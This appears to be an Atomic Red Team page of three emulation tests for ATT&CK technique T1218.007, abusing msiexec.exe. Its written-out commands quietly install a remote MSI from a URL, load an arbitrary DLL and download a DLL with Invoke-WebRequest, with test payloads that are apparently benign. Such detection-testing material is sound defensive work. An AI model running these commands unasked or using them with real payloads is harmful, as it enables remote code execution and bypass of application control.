Try it using Invoke-Atomic

Signed Binary Proxy Execution: Msiexec

Description from ATT&CK

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.

Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018) https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/

Atomic Tests

Atomic Test #1 - Msiexec.exe - Execute Local MSI file

Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed.

Supported Platforms: windows

auto_generated_guid: 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8

Inputs:

Name Description Type Default Value
msi_payload MSI file to execute Path PathToAtomicsFolder\T1218.007\src\Win32\T1218.msi

Attack Commands: Run with command_prompt!

1
2
msiexec.exe /q /i "#{msi_payload}"

Dependencies: Run with powershell!

Description: T1218.msi must exist on disk at specified location (#{msi_payload})

Check Prereq Commands:

1
2
if (Test-Path #{msi_payload}) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
Write-Host "You must provide your own MSI"

Atomic Test #2 - Msiexec.exe - Execute Remote MSI file

Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed.

Supported Platforms: windows

auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649

Inputs:

Name Description Type Default Value
msi_payload MSI file to execute String https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/Win32/T1218.msi

Attack Commands: Run with command_prompt!

1
2
msiexec.exe /q /i "#{msi_payload}"

Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL

Execute arbitrary DLL file stored locally. Commonly seen in application installation. Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32 bit systems change the dll_payload argument to the Win32 folder. By default, if the src folder is not in place, it will download the 64 bit version.

Supported Platforms: windows

auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec

Inputs:

Name Description Type Default Value
dll_payload DLL to execute Path PathToAtomicsFolder\T1218.007\src\x64\T1218.dll

Attack Commands: Run with command_prompt!

1
2
msiexec.exe /y "#{dll_payload}"

Dependencies: Run with powershell!

Description: T1218.dll must exist on disk at specified location (#{dll_payload})

Check Prereq Commands:

1
2
if (Test-Path #{dll_payload}) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
3
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/x64/T1218.dll" -OutFile "#{dll_payload}"

source